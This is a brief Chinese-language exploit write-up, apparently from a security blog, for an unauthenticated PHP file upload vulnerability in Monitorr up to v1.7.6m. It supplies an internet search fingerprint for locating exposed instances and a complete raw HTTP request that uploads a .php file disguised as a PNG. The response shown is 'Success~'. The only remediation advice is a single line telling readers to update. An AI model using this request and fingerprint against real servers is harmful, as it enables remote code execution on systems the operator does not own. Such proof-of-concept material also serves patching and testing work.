0x01 前言
0x02 影响平台
Monitorr ≤ v1.7.6m
0x03 漏洞复现
搜索语法
icon_hash="-211006074"
页面是这个酱紫
EXP如下:
POST /assets/php/upload.php HTTP/1.1
Host: ip:port
Content-Length: 412
Accept: text/plain, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_12) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5799.196 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMmx988TUuintqO4Q
Origin: http://127.0.0.1
Referer: http://127.0.0.1/assets/php/monitorr-services_settings.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundaryMmx988TUuintqO4Q
Content-Disposition: form-data; name="fileToUpload"; filename="2.php"
Content-Type: image/png
phpinfo();
------WebKitFormBoundaryMmx988TUuintqO4Q--
Success~
0x04 修复方案
建议及时更新至最新版本!
推荐站内搜索:最好用的开发软件、免费开源系统、渗透测试工具云盘下载、最新渗透测试资料、最新黑客工具下载……
还没有评论,来说两句吧...